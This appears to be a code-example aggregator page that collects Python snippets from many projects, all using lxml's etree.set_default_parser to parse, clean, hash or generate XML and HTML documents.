Beispiel #1
0
def get_hash(xml_string):
    """
    Get the has of an XML String
    :param xml_string: XML String to hash
    :return:
    """
    hash_parser = etree.XMLParser(remove_blank_text=True,
                                  remove_comments=True,
                                  remove_pis=True)
    etree.set_default_parser(parser=hash_parser)

    # parse the XML String removing blanks, comments, processing instructions
    try:
        xml_tree = etree.parse(BytesIO(xml_string.encode('utf-8')))
    except:
        xml_tree = etree.parse(BytesIO(xml_string))
    # remove all annotations
    annotations = xml_tree.findall(
        ".//{http://www.w3.org/2001/XMLSchema}annotation")
    for annotation in annotations:
        annotation.getparent().remove(annotation)
    clean_xml_string = etree.tostring(xml_tree)

    # transform into dict and order it
    xml_dict = xmltodict.parse(clean_xml_string, dict_constructor=dict)
    clean_ordered_xml_string = str(sort_dict(xml_dict))

    # compute the hash
    hash = hashlib.sha1(clean_ordered_xml_string)

    return hash.hexdigest()
Beispiel #2
0
def get_hash(xml_string):
    """ Get the hash of an XML String. Removes blank text, comments,
    processing instructions and annotations from the input. Allows to
    retrieve the same hash for two similar XML string.

    Args:
        xml_string (str): XML String to hash

    Returns:
        str: SHA-1 hash of the XML string
    """
    # Load the required parser
    hash_parser = etree.XMLParser(remove_blank_text=True,
                                  remove_comments=True,
                                  remove_pis=True)
    etree.set_default_parser(parser=hash_parser)

    xml_tree = XSDTree.build_tree(xml_string)

    # Remove all annotations
    annotations = xml_tree.findall(
        ".//{http://www.w3.org/2001/XMLSchema}annotation")
    for annotation in annotations:
        annotation.getparent().remove(annotation)
    clean_xml_string = XSDTree.tostring(xml_tree)

    # Parse XML string into dict
    xml_dict = xmltodict.parse(clean_xml_string, dict_constructor=dict)
    # Returns the SHA-1 hash of the ordered dict
    return hash_dict(xml_dict)
    def test_reload_restriction(self):
        # FIXME relaod restriction doesn't work
        xsd_files = join('restriction', 'basic')
        xsd_tree = self.simple_type_data_handler.get_xsd(xsd_files)
        xsd_element = xsd_tree.xpath(
            '/xs:schema/xs:simpleType',
            namespaces=self.request.session['namespaces'])[0]

        self.request.session['curate_edit'] = True

        xml_tree = self.simple_type_data_handler.get_xml(xsd_files)
        xml_data = etree.tostring(xml_tree)

        xml_value = xml_tree.xpath(
            "/root", namespaces=self.request.session['namespaces'])[0].text

        clean_parser = etree.XMLParser(remove_blank_text=True,
                                       remove_comments=True,
                                       remove_pis=True)
        etree.set_default_parser(parser=clean_parser)
        # load the XML tree from the text
        edit_data_tree = etree.XML(str(xml_data.encode('utf-8')))

        result_string = generate_simple_type(self.request,
                                             xsd_element,
                                             xsd_tree,
                                             full_path='/root',
                                             default_value=xml_value,
                                             edit_data_tree=edit_data_tree)
        # print result_string

        expected_dict = self.simple_type_data_handler.get_json(xsd_files +
                                                               '.reload')

        self.assertDictEqual(result_string[1], expected_dict)
    def test_reload_sequence_unbounded(self):
        # fixme reload sequence unbounded has a bug
        # fixme choice iter and inner element repeated

        xsd_files = join("sequence", "unbounded")
        xsd_tree = self.choice_data_handler.get_xsd(xsd_files)
        xsd_element = xsd_tree.xpath(
            "/xs:schema/xs:complexType/xs:choice", namespaces=self.request.session["namespaces"]
        )[0]

        self.request.session["curate_edit"] = True

        xml_tree = self.choice_data_handler.get_xml(xsd_files)
        xml_data = etree.tostring(xml_tree)

        clean_parser = etree.XMLParser(remove_blank_text=True, remove_comments=True, remove_pis=True)
        etree.set_default_parser(parser=clean_parser)
        # load the XML tree from the text
        edit_data_tree = etree.XML(str(xml_data.encode("utf-8")))
        result_string = generate_choice(
            self.request, xsd_element, xsd_tree, full_path="/root", edit_data_tree=edit_data_tree
        )
        # print result_string

        expected_element = self.choice_data_handler.get_json(xsd_files + ".reload")

        self.assertDictEqual(result_string[1], expected_element)
    def test_multiple(self):
        xsd_files = join('multiple', 'basic')
        xsd_tree = self.extension_data_handler.get_xsd(xsd_files)
        xsd_element = xsd_tree.xpath(
            '/xs:schema/xs:element/xs:complexType/xs:complexContent/xs:extension',
            namespaces=self.request.session['namespaces'])[0]

        xml_tree = self.extension_data_handler.get_xml(xsd_files)
        xml_data = etree.tostring(xml_tree)

        clean_parser = etree.XMLParser(remove_blank_text=True,
                                       remove_comments=True,
                                       remove_pis=True)
        etree.set_default_parser(parser=clean_parser)

        # load the XML tree from the text
        edit_data_tree = etree.XML(str(xml_data.encode('utf-8')))
        # default_value = edit_data_tree.xpath('/root[1]', namespaces=self.request.session['namespaces'])

        result_string = generate_extension(self.request,
                                           xsd_element,
                                           xsd_tree,
                                           full_path='/root[1]',
                                           default_value=edit_data_tree,
                                           edit_data_tree=edit_data_tree)
        # print result_string
        # result_string = '<div>' + result_string + '</div>'

        expected_dict = self.extension_data_handler.get_json(xsd_files +
                                                             '.reload')

        self.assertDictEqual(result_string[1], expected_dict)
def get_hash(xml_string):
    """
    Get the has of an XML String
    :param xml_string: XML String to hash
    :return:
    """
    hash_parser = etree.XMLParser(remove_blank_text=True, remove_comments=True, remove_pis=True)
    etree.set_default_parser(parser=hash_parser)

    # parse the XML String removing blanks, comments, processing instructions
    try:
        xml_tree = etree.parse(BytesIO(xml_string.encode('utf-8')))
    except:
        xml_tree = etree.parse(BytesIO(xml_string))
    # remove all annotations
    annotations = xml_tree.findall(".//{http://www.w3.org/2001/XMLSchema}annotation")
    for annotation in annotations:
        annotation.getparent().remove(annotation)
    clean_xml_string = etree.tostring(xml_tree)

    # transform into dict and order it
    xml_dict = xmltodict.parse(clean_xml_string, dict_constructor=dict)
    clean_ordered_xml_string = str(sort_dict(xml_dict))

    # compute the hash
    hash = hashlib.sha1(clean_ordered_xml_string)

    return hash.hexdigest()
Beispiel #7
0
def setup_html():
    global etree
    try:
        from lxml import etree
    except ImportError:
        print("can't validate the XHTML parts in Jinja2 templates"
              " (no lxml installed)")

    if etree and pv(etree.__version__) < pv('2.0.0'):
        # 2.0.7 and 2.1.x are known to work.
        print("can't validate the XHTML parts in Jinja2 templates"
              " (lxml < 2.0, api incompatibility)")

    if etree:
        # Note: this code derived from trac/tests/functional (FIXME)

        class Resolver(etree.Resolver):
            # ./contrib/jinjachecker.py # <- we live here
            # ./trac/tests/functional/  # <- there are the DTDs
            contrib_dir = dirname(abspath(__file__))
            base_dir = normpath(join(contrib_dir, '../trac/tests/functional'))

            def resolve(self, system_url, public_id, context):
                filename = join(self.base_dir, system_url.split("/")[-1])
                return self.resolve_filename(filename, context)

        parser = etree.XMLParser(dtd_validation=True)
        parser.resolvers.add(Resolver())
        etree.set_default_parser(parser)
    return etree
    def test_reload_multiple(self):
        # fixme test broken
        xsd_files = join('multiple', 'basic')
        xsd_tree = self.complex_type_data_handler.get_xsd(xsd_files)
        xsd_element = xsd_tree.xpath(
            '/xs:schema/xs:complexType',
            namespaces=self.request.session['namespaces'])[0]

        self.request.session['curate_edit'] = True

        xml_tree = self.complex_type_data_handler.get_xml(xsd_files)
        xml_data = etree.tostring(xml_tree)

        clean_parser = etree.XMLParser(remove_blank_text=True,
                                       remove_comments=True,
                                       remove_pis=True)
        etree.set_default_parser(parser=clean_parser)
        # load the XML tree from the text
        edit_data_tree = etree.XML(str(xml_data.encode('utf-8')))
        result_string = generate_complex_type(self.request,
                                              xsd_element,
                                              xsd_tree,
                                              full_path='/root',
                                              edit_data_tree=edit_data_tree)
        # print result_string

        expected_element = self.complex_type_data_handler.get_json(xsd_files +
                                                                   '.reload')

        self.assertDictEqual(result_string[1], expected_element)
Beispiel #9
0
    def import_file(self, source):
        """imports BuildingSync file

        :param source: string | object, path to file or a file like object
        :param require_version: bool, if true it raises an exception if unable to find version info
        """
        parser = etree.XMLParser(remove_blank_text=True)
        etree.set_default_parser(parser)
        # save element tree
        if isinstance(source, str):
            if not os.path.isfile(source):
                raise ParsingError("File not found: {}".format(source))
            with open(source) as f:
                self.element_tree = etree.parse(f)
        else:
            self.element_tree = etree.parse(source)

        self.version = self._parse_version()

        # if the namespace map is missing the auc or xsi prefix, fix the tree to include it
        root_nsmap = self.element_tree.getroot().nsmap
        if root_nsmap.get('auc') is None or root_nsmap.get('xsi') is None:
            self.fix_namespaces()

        root = self.element_tree.getroot()
        root.set(
            '{http://www.w3.org/2001/XMLSchema-instance}schemaLocation',
            'http://buildingsync.net/schemas/bedes-auc/2019 https://raw.githubusercontent.com/BuildingSync/schema/v{}/BuildingSync.xsd'
            .format(self.version))

        return True
    def test_reload_restriction(self):
        # FIXME relaod restriction doesn't work
        xsd_files = join('restriction', 'basic')
        xsd_tree = self.simple_type_data_handler.get_xsd(xsd_files)
        xsd_element = xsd_tree.xpath('/xs:schema/xs:simpleType', namespaces=self.request.session['namespaces'])[0]

        self.request.session['curate_edit'] = True

        xml_tree = self.simple_type_data_handler.get_xml(xsd_files)
        xml_data = etree.tostring(xml_tree)

        xml_value = xml_tree.xpath("/root", namespaces=self.request.session['namespaces'])[0].text

        clean_parser = etree.XMLParser(remove_blank_text=True, remove_comments=True, remove_pis=True)
        etree.set_default_parser(parser=clean_parser)
        # load the XML tree from the text
        edit_data_tree = etree.XML(str(xml_data.encode('utf-8')))

        result_string = generate_simple_type(self.request, xsd_element, xsd_tree, full_path='/root',
                                             default_value=xml_value, edit_data_tree=edit_data_tree)
        # print result_string

        expected_dict = self.simple_type_data_handler.get_json(xsd_files + '.reload')

        self.assertDictEqual(result_string[1], expected_dict)
    def test_reload_simple_type_unbounded(self):
        xsd_files = join('simple_type', 'unbounded')
        xsd_tree = self.element_data_handler.get_xsd(xsd_files)
        xsd_element = xsd_tree.xpath(
            '/xs:schema/xs:complexType/xs:sequence/xs:element',
            namespaces=self.request.session['namespaces'])[0]

        self.request.session['curate_edit'] = True

        xml_tree = self.element_data_handler.get_xml(xsd_files)
        xml_data = etree.tostring(xml_tree)

        clean_parser = etree.XMLParser(remove_blank_text=True,
                                       remove_comments=True,
                                       remove_pis=True)
        etree.set_default_parser(parser=clean_parser)
        edit_data_tree = etree.XML(str(xml_data.encode('utf-8')))

        result_string = generate_element(self.request,
                                         xsd_element,
                                         xsd_tree,
                                         full_path='/root',
                                         edit_data_tree=edit_data_tree)

        expected_element = self.element_data_handler.get_json(xsd_files +
                                                              '.reload')

        self.assertDictEqual(result_string[1], expected_element)
Beispiel #12
0
def download_xml_build_req(request):
    #POST request
    if request.method == 'POST':
        if 'xmlStringOAIPMH' in request.session:
            #We retrieve the XML file in session
            xmlDataObject = request.session['xmlStringOAIPMH']
            try:
                # Load a parser able to clean the XML from blanks, comments and processing instructions
                clean_parser = etree.XMLParser(remove_blank_text=True,
                                               remove_comments=True,
                                               remove_pis=True)
                # set the parser
                etree.set_default_parser(parser=clean_parser)
                # load the XML tree from the text
                xmlDoc = etree.XML(str(xmlDataObject.encode('utf-8')))
                xmlStringEncoded = etree.tostring(xmlDoc, pretty_print=True)
            except:
                xmlStringEncoded = xmlDataObject

            #Get the date to append it to the file title
            i = datetime.datetime.now()
            title = "OAI_PMH_BUILD_REQ_%s_.xml" % i.isoformat()
            #Use the XML2Download collection to save the XML to download. We can't directly return the XML
            #because this method is called via Ajax. We need to save the XML and call the GET request of this function
            #in the success part of the Ajax call
            xml2download = XML2Download(title=title,
                                        xml=xmlStringEncoded).save()
            xml2downloadID = str(xml2download.id)
            #Return the ID to call the GET request with it
            response_dict = {"xml2downloadID": xml2downloadID}
            return HttpResponse(json.dumps(response_dict),
                                content_type='application/javascript')
        else:
            return HttpResponseBadRequest(
                'An error occured. Please reload the page and try again.')
    else:
        #Get the XML2Download ID
        xml2downloadID = request.GET.get('id', None)
        if xml2downloadID is not None:
            #Get the XML
            xmlDataObject = XML2Download.objects.get(pk=xml2downloadID)
            #Encode the XML
            xmlStringEncoded = xmlDataObject.xml.encode('utf-8')
            fileObj = StringIO(xmlStringEncoded)
            #Delete the record
            xmlDataObject.delete()
            #Check that the file is ending by .xml
            if not xmlDataObject.title.lower().endswith('.xml'):
                xmlDataObject.title += ".xml"
            #Return the XML file
            response = HttpResponse(FileWrapper(fileObj),
                                    content_type='application/xml')
            response[
                'Content-Disposition'] = 'attachment; filename=' + xmlDataObject.title
            request.session['xmlStringOAIPMH'] = xmlStringEncoded

            return response
        else:
            return redirect('/')
def read_xml_file(xml_path, namespace_dict=None, remove_comments=False):
    parser = etree.XMLParser(remove_comments=remove_comments)
    tree = etree.parse(xml_path, parser=parser)
    etree.set_default_parser(parser)
    if namespace_dict:
        for prefix, uri in namespace_dict.items():
            etree.register_namespace(prefix, uri)
    return tree
 def cleanXML(self, xml):
     clean_parser = etree.XMLParser(remove_blank_text=True,remove_comments=True,remove_pis=True)
     # set the parser
     etree.set_default_parser(parser=clean_parser)
     # load the XML tree from the text
     xmlEncoding = etree.XML(str(xml.encode('utf-8')))
     xmlStr = etree.tostring(xmlEncoding)
     return xmlStr
Beispiel #15
0
 def cleanXML(self, xml):
     clean_parser = etree.XMLParser(remove_blank_text=True,remove_comments=True,remove_pis=True)
     # set the parser
     etree.set_default_parser(parser=clean_parser)
     # load the XML tree from the text
     xmlEncoding = etree.XML(str(xml.encode('utf-8')))
     xmlStr = etree.tostring(xmlEncoding)
     return xmlStr
Beispiel #16
0
    def __init__(self, filename=None, log=None):
        self.log = log

        if filename is not None:
            self.filename = filename

        parser = ET.XMLParser(remove_blank_text=True)

        ET.set_default_parser(parser)
Beispiel #17
0
def MyParser():
    if etree.get_default_parser is XSD_PARSER:
        yield
    else:
        etree.set_default_parser(XSD_PARSER)
        try:
            yield
        finally:
            etree.set_default_parser()
Beispiel #18
0
    def __init__(self, **kwargs):
        """Constructs an SVGParser object.

        Arguments:
            **kwargs: See lxml.etree.XMLParser.__init__().
        """
        self._parser = etree.XMLParser(**kwargs)
        self._parser.set_element_class_lookup(SVGElementClassLookup())
        etree.set_default_parser(self._parser)
def resolve_dependencies(request):
    print 'BEGIN def resolveDependencies(request)'
    schema_locations = request.POST.getlist('schemaLocations[]')
    dependencies = request.POST.getlist('dependencies[]')

    if ('uploadObjectName' in request.session and request.session['uploadObjectName'] is not None and
        'uploadObjectFilename' in request.session and request.session['uploadObjectFilename'] is not None and
        'uploadObjectContent' in request.session and request.session['uploadObjectContent'] is not None and
        'uploadObjectType' in request.session and request.session['uploadObjectType'] is not None):
        object_content = request.session['uploadObjectContent']
        name = request.session['uploadObjectName']
        filename = request.session['uploadObjectFilename']
        object_type = request.session['uploadObjectType']

    # Load a parser able to clean the XML from blanks, comments and processing instructions
    clean_parser = etree.XMLParser(remove_blank_text=True, remove_comments=True, remove_pis=True)
    # set the parser
    etree.set_default_parser(parser=clean_parser)

    xsd_tree = etree.XML(str(object_content.encode('utf-8')))

    # replace includes/imports by API calls (get dependencies starting by the imports)
    update_dependencies(xsd_tree, dict(zip(schema_locations, dependencies)))

    # validate the schema
    error = validate_xml_schema(xsd_tree)

    if error is None:
        object_content = etree.tostring(xsd_tree)
        # create a new version
        if 'uploadVersion' in request.session and request.session['uploadVersion'] is not None:
            object_versions_id = request.session['uploadVersion']
            if object_type == 'Template':
                new_template = create_template_version(object_content, filename, object_versions_id)
                redirect = '/admin/manage_versions?type={0}&id={1}'.format(object_type, str(new_template.id))
            elif object_type == 'Type':
                new_type = create_type_version(object_content, filename, object_versions_id)
                redirect = '/admin/manage_versions?type={0}&id={1}'.format(object_type, str(new_type.id))
        # create new object
        else:
            # save the object
            if object_type == "Template":
                create_template(object_content, name, filename, dependencies)
                redirect = '/admin/xml-schemas/manage-schemas'
            elif object_type == "Type":
                if 'uploadBuckets' in request.session and request.session['uploadBuckets'] is not None:
                    buckets = request.session['uploadBuckets']
                create_type(object_content, name, filename, buckets, dependencies)
                redirect = '/admin/xml-schemas/manage-types'

        response_dict = {'redirect': redirect}
        messages.add_message(request, messages.INFO, '{} uploaded with success.'.format(object_type))
        return HttpResponse(json.dumps(response_dict), content_type='application/javascript')
    else:
        response_dict = {'errorDependencies': error.replace("'", "")}
        return HttpResponse(json.dumps(response_dict), content_type='application/javascript')
Beispiel #20
0
 def __init__(self, k, ref):
     etree.set_default_parser(etree.HTMLParser())
     self.s = requests.Session()
     # CZ: 213.211.36.146:8080
     #self.s.proxies={'https': '187.141.117.215:8080'}
     self.s.headers = self.headers.copy()
     # 'https://www.google.com/recaptcha/api2/demo'
     self.s.headers['Referer'] = ref
     self.s.params = {'k': k}
     self.k = k
Beispiel #21
0
 def __init__(self):
     etree.set_default_parser(etree.HTMLParser())
     #self.sessid=randint(0, 1000000)
     super().__init__(pp, {
         'User-Agent':
         'Mozilla/5.0 (X11; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0'
     },
                      proxy_headers=proxy_headers,
                      timeout=timeout)
     self.baseurl = None
def download_xml_build_req(request):
    #POST request
    if request.method == 'POST':
        if 'xmlStringOAIPMH' in request.session:
            #We retrieve the XML file in session
            xmlDataObject = request.session['xmlStringOAIPMH']
            try:
                # Load a parser able to clean the XML from blanks, comments and processing instructions
                clean_parser = etree.XMLParser(remove_blank_text=True, remove_comments=True, remove_pis=True)
                # set the parser
                etree.set_default_parser(parser=clean_parser)
                # load the XML tree from the text
                xmlDoc = etree.XML(str(xmlDataObject.encode('utf-8')))
                xmlStringEncoded = etree.tostring(xmlDoc, pretty_print=True)
            except:
                xmlStringEncoded = xmlDataObject

            #Get the date to append it to the file title
            i = datetime.datetime.now()
            title = "OAI_PMH_BUILD_REQ_%s_.xml" % i.isoformat()
            #Use the XML2Download collection to save the XML to download. We can't directly return the XML
            #because this method is called via Ajax. We need to save the XML and call the GET request of this function
            #in the success part of the Ajax call
            xml2download = XML2Download(title=title, xml=xmlStringEncoded).save()
            xml2downloadID = str(xml2download.id)
            #Return the ID to call the GET request with it
            response_dict = {"xml2downloadID": xml2downloadID}
            return HttpResponse(json.dumps(response_dict), content_type='application/javascript')
        else:
            return HttpResponseBadRequest('An error occured. Please reload the page and try again.')
    else:
        #Get the XML2Download ID
        xml2downloadID = request.GET.get('id', None)
        if xml2downloadID is not None:
            #Get the XML
            xmlDataObject = XML2Download.objects.get(pk=xml2downloadID)
            #Encode the XML
            xmlStringEncoded = xmlDataObject.xml.encode('utf-8')
            fileObj = StringIO(xmlStringEncoded)
            #Delete the record
            xmlDataObject.delete()
            #Check that the file is ending by .xml
            if not xmlDataObject.title.lower().endswith('.xml'):
                xmlDataObject.title += ".xml"
            #Return the XML file
            response = HttpResponse(FileWrapper(fileObj), content_type='application/xml')
            response['Content-Disposition'] = 'attachment; filename=' + xmlDataObject.title
            request.session['xmlStringOAIPMH'] = xmlStringEncoded

            return response
        else:
            return redirect('/')
Beispiel #23
0
 def __init__(self):
     etree.set_default_parser(etree.HTMLParser())
     super().__init__(
         pp,
         headers={
             'User-Agent':
             'Mozilla/5.0 (X11; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0',
             #            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
             'Accept-Language': 'en-US,en;q=0.5',
             #            'Accept-Encoding': 'gzip, deflate',
         },
         timeout=180)
     self.cache = basedir
Beispiel #24
0
def main():
    number_of_args = len(sys.argv)
    parser = etree.XMLParser(remove_comments=False)
    etree.set_default_parser(parser)

    if (number_of_args < 6):
        print_help()
        exit(-1)

    folder = sys.argv[1]
    numberofrobots = int(sys.argv[2])
    alpha = float(sys.argv[3])
    rho = float(sys.argv[4])
    speed = float(sys.argv[5])
    generated_configs_folder = folder + "/generated_configs"

    if not os.path.exists(generated_configs_folder):
        os.makedirs(generated_configs_folder)

    tree = etree.parse(folder + "/kilobot_generic_controller.argos")
    root = tree.getroot()

    for params in root.iter('params'):
        # print(params.attrib)
        if (params.get("behavior") ==
                "build/behaviors_simulation/CRWLEVY_2.0_0.90"):
            params.set(
                "behavior", "build/behaviors_simulation/CRWLEVY_" +
                "%.1f_" % alpha + "%.2f" % rho)
        if (params.get("linearvelocity")):
            params.set("linearvelocity", "%.2f" % speed)

    for loop_functions in root.iter('loop_functions'):
        # print(loop_functions.attrib)
        loop_functions.set("alpha", "%.1f" % alpha)
        loop_functions.set("rho", "%.2f" % rho)
        loop_functions.set("num_robots", "%d" % numberofrobots)
        loop_functions.set("speed", "%.2f" % speed)
    tree.write(generated_configs_folder +
               "/kilobot_sim_%.02f_%d_%.1f_%.2f.argos" %
               (speed, numberofrobots, alpha, rho),
               xml_declaration=True)

    comments = tree.xpath('//comment()')

    for c in comments:
        p = c.getparent()
        p.remove(c)
Beispiel #25
0
    def get_flat(self):
        """ Returns the flattened file

        Returns:

        """
        # builds the parser
        parser = etree.XMLParser(remove_blank_text=True,
                                 remove_comments=True,
                                 remove_pis=True)
        # sets the parser
        etree.set_default_parser(parser=parser)

        # parse the XML String removing blanks, comments, processing instructions
        xml_tree = XSDTree.build_tree(self.xml_string)

        # replace the includes by their content
        return self._replace_all_includes_by_content(xml_tree)
Beispiel #26
0
    def test_reverse24x24conversion(self):
        self.maxDiff = None
        for dirpath, dirnames, filenames in os.walk(GEN_DIR):
            for f in filenames:

                # Generated filepath
                gen_filepath = os.path.join(dirpath, f)

                # Filter out files
                if not (f.endswith('.svg') and '/24'
                        in gen_filepath) or os.path.islink(gen_filepath):
                    continue

                etree.set_default_parser(
                    etree.XMLParser(remove_blank_text=True))

                # Generated root
                gen_root = etree.parse(gen_filepath).getroot()

                # Res filepath and root
                res_filepath = gen_filepath.replace(GEN_DIR, RES_DIR,
                                                    1).replace('/24', '/22')
                res_root = etree.parse(res_filepath).getroot()

                # Resize to 22x22
                gen_root.set('viewBox', "0 0 22 22")
                gen_root.set('width', "22")
                gen_root.set('height', "22")

                # Remove group that moves content down 1px, right 1px
                group = gen_root.find('./{http://www.w3.org/2000/svg}g',
                                      NAMESPACES)
                gen_root.extend(get_renderable_elements(group))
                gen_root.remove(group)

                # Compare elements and attributes
                for gen_elem, res_elem in zip(
                        res_root.iterfind('./svg:*', NAMESPACES),
                        gen_root.iterfind('./svg:*', NAMESPACES)):
                    self.assertEqual(res_elem.tag, gen_elem.tag, gen_filepath)
                    for attribute in res_elem.items():
                        self.assertIn(attribute, gen_elem.items(),
                                      gen_filepath)
                pass
    def test_reload_attribute(self):
        xsd_files = join('attribute', 'basic')
        xsd_tree = self.complex_type_data_handler.get_xsd(xsd_files)
        xsd_element = xsd_tree.xpath('/xs:schema/xs:complexType', namespaces=self.request.session['namespaces'])[0]

        self.request.session['curate_edit'] = True

        xml_tree = self.complex_type_data_handler.get_xml(xsd_files)
        xml_data = etree.tostring(xml_tree)

        clean_parser = etree.XMLParser(remove_blank_text=True, remove_comments=True, remove_pis=True)
        etree.set_default_parser(parser=clean_parser)
        # load the XML tree from the text
        edit_data_tree = etree.XML(str(xml_data.encode('utf-8')))
        result_string = generate_complex_type(self.request, xsd_element, xsd_tree, full_path='/root',
                                              edit_data_tree=edit_data_tree)
        # print result_string
        expected_element = self.complex_type_data_handler.get_json(xsd_files + '.reload')
        self.assertDictEqual(result_string[1], expected_element)
def main():
    number_of_args = len(sys.argv)
    parser = etree.XMLParser(remove_comments=False)
    etree.set_default_parser(parser)

    if (number_of_args < 2):
        print_help()
        exit(-1)

    folder = sys.argv[1]

    generated_configs_folder = folder

    if not os.path.exists(generated_configs_folder):
        os.makedirs(generated_configs_folder)

    tree = etree.parse(folder + "/kilobot_generic_controller.argos")
    root = tree.getroot()
    speed = "0.0"
    for params in root.iter('params'):
        # print(params.attrib)
        speed = params.get("linearvelocity", speed)

    for loop_functions in root.iter('loop_functions'):
        # print(loop_functions.attrib)
        loop_functions.set("speed", speed)

    visualization = etree.SubElement(root, "visualization")

    qt_opengl = etree.SubElement(visualization, "qt-opengl")
    camera = etree.SubElement(qt_opengl, "camera")
    placement = etree.SubElement(camera,
                                 "placement",
                                 idx="0",
                                 position="-0.616296,0.025,0.461661",
                                 look_at="0.0978462,0.025,-0.23834",
                                 up="0.700001,0,0.714142",
                                 lens_focal_length="20")

    tree.write(generated_configs_folder +
               "/kilobot_generic_controller_viz.argos",
               xml_declaration=True)
Beispiel #29
0
    def get_flat(self):
        parser = etree.XMLParser(remove_blank_text=True, remove_comments=True, remove_pis=True)
        etree.set_default_parser(parser=parser)

        # parse the XML String removing blanks, comments, processing instructions
        xmlTree = etree.parse(BytesIO(self.xmlString.encode('utf-8')))

        # check if it has includes
        includes = xmlTree.findall("{http://www.w3.org/2001/XMLSchema}include")
        if len(includes) > 0:
            for el_include in includes:
                uri = el_include.attrib['schemaLocation']
                flatDependency = self.get_flat_dependency(uri)
                if flatDependency is not None:
                    # append flatDependency to the tree
                    dependencyTree = etree.fromstring(flatDependency)
                    dependencyElements = dependencyTree.getchildren()
                    for element in dependencyElements:
                        xmlTree.getroot().append(element)
                el_include.getparent().remove(el_include)
        return etree.tostring(xmlTree)
    def get_flat(self):
        parser = etree.XMLParser(remove_blank_text=True, remove_comments=True, remove_pis=True)
        etree.set_default_parser(parser=parser)

        # parse the XML String removing blanks, comments, processing instructions
        xmlTree = etree.parse(BytesIO(self.xmlString.encode('utf-8')))

        # check if it has includes
        includes = xmlTree.findall("{http://www.w3.org/2001/XMLSchema}include")
        if len(includes) > 0:
            for el_include in includes:
                uri = el_include.attrib['schemaLocation']
                flatDependency = self.get_flat_dependency(uri)
                if flatDependency is not None:
                    # append flatDependency to the tree
                    dependencyTree = etree.fromstring(flatDependency)
                    dependencyElements = dependencyTree.getchildren()
                    for element in dependencyElements:
                        xmlTree.getroot().append(element)
                el_include.getparent().remove(el_include)
        return etree.tostring(xmlTree)
    def test_sequence(self):
        xsd_files = join('sequence', 'basic')
        xsd_tree = self.extension_data_handler.get_xsd(xsd_files)
        xsd_element = xsd_tree.xpath('/xs:schema/xs:element/xs:complexType/xs:complexContent/xs:extension',
                                     namespaces=self.session['namespaces'])[0]

        xml_tree = self.extension_data_handler.get_xml(xsd_files)
        xml_data = etree.tostring(xml_tree)

        xml_value = ''

        clean_parser = etree.XMLParser(remove_blank_text=True, remove_comments=True, remove_pis=True)
        etree.set_default_parser(parser=clean_parser)
        # load the XML tree from the text
        edit_data_tree = etree.XML(str(xml_data.encode('utf-8')))
        result_string = generate_extension(self.request, xsd_element, xsd_tree, full_path='/root[1]',
                                           default_value=xml_value, edit_data_tree=edit_data_tree)
        # print result_string
        # result_string = '<div>' + result_string + '</div>'

        expected_dict = self.extension_data_handler.get_json(xsd_files+'.reload')

        self.assertDictEqual(result_string[1], expected_dict)
Beispiel #32
0
def get_tree_and_root_by_file_name(input_file_name=None, log_file=None,
    verbosity=None):
    me = 'get_tree_and_root_by_file_name'
    '''
    Parse given input file as an xml document
    For any exception, write it to give logfile and return None, None

    Parse the document and return tuple of doctree and doctree.get_root()
    '''

    #parser = etree.XMLParser(remove_comments=False, remove_blank_text=True)
    parser = etree.XMLParser(encoding='utf-8',remove_blank_text=True,
      remove_comments=False)
    etree.set_default_parser(parser)

    try:
        with open(input_file_name, mode='r', encoding='utf-8-sig') \
            as input_bytes_file:

            try:
                tree = etree.parse(input_bytes_file, parser=parser)
            except Exception as e:

                log_msg = (
                    "{}:Skipping exception='{}' in input_file_name='{}'"
                    .format(me, repr(e), input_file_name))
                print(log_msg, file=log_file)
                return None, None
    except Exception as ex:
        msg=f"{me}: skipping exception to read {input_file_name}"
        print(msg, file=log_file, flush=True)
        print(msg,  flush=True)
        return None, None

    # end with open

    return tree, tree.getroot()
Beispiel #33
0
#!/usr/bin/env python3

from lxml import etree
etree.set_default_parser(etree.HTMLParser())
import os
import subprocess
import requests
from urllib.parse import urljoin
from io import BytesIO

tmpdir = './tmp/'
indexes = [
    'http://www.budget.gov.au/2014-15/content/bp1/html/index.htm',
    'http://www.budget.gov.au/2014-15/content/bp2/html/index.htm',
    'http://www.budget.gov.au/2014-15/content/bp3/html/index.htm',
    'http://www.budget.gov.au/2014-15/content/bp4/html/index.htm' ]
chunk_size = 4096

def main():
    pdfs = []
    for index_uri in indexes:
        print("up to:", index_uri)
        data = requests.get(index_uri).content
        et = etree.parse(BytesIO(data))
        for elem in et.xpath('//a[contains(@href, ".pdf")]'):
            href = elem.get('href')
            if href.find('consolidated') == -1:
                continue
            idx = len(pdfs)
            pdf = os.path.join(tmpdir, '%d.pdf' % (idx))
            pdfs.append(pdf)
Beispiel #34
0
from scrapi.base.transformer import XMLTransformer, JSONTransformer
from scrapi.base.helpers import (
    updated_schema,
    build_properties,
    oai_get_records_and_token,
    compose,
    date_formatter,
    null_on_error,
    coerce_to_list
)

logging.basicConfig(level=logging.INFO)

logger = logging.getLogger(__name__)

etree.set_default_parser(etree.XMLParser(recover=True))


class HarvesterMeta(abc.ABCMeta):
    def __init__(cls, name, bases, dct):
        super(HarvesterMeta, cls).__init__(name, bases, dct)
        if len(cls.__abstractmethods__) == 0 and cls.short_name not in settings.disabled:
            registry[cls.short_name] = cls()
        else:
            logger.info('Class {} not added to registry'.format(cls.__name__))


@six.add_metaclass(HarvesterMeta)
class BaseHarvester(object):
    """ This is a base class that all harvesters should inheret from
#!/usr/bin/env python
# SetupCophylogenyAnalysis.py

import sys
from optparse import OptionParser
try:
    from lxml import etree as ElementTree
    from lxml.etree import Element, Comment, XMLParser
    ElementTree.set_default_parser(XMLParser(remove_blank_text=True,
                                             remove_comments=True))
except ImportError:
    print >> sys.stderr, '*** lxml unavailable, falling back on standard XML', \
                         'implementation ***'
    from xml.etree import ElementTree
    from xml.etree.ElementTree import Element, Comment

parser = OptionParser()
parser.add_option('-a', '--associations', dest='assoc_filename')
parser.add_option('-i', '--host', dest='HOST_TAXON')
parser.add_option('-j', '--host-xml', dest='HOST_XML')
parser.add_option('-s', '--symbiont', dest='SYMBIONT_TAXON')
parser.add_option('-t', '--symbiont-xml', dest='SYMBIONT_XML')

(options, args) = parser.parse_args()

# XML tags, attributes, etc.
ATTR = 'attr'
BRANCH_RATES = 'branchRates'
CLOCK = 'clock'
COALESCENT_LIKELIHOOD = 'coalescentLikelihood'
COEVOLUTION = 'coevolution'
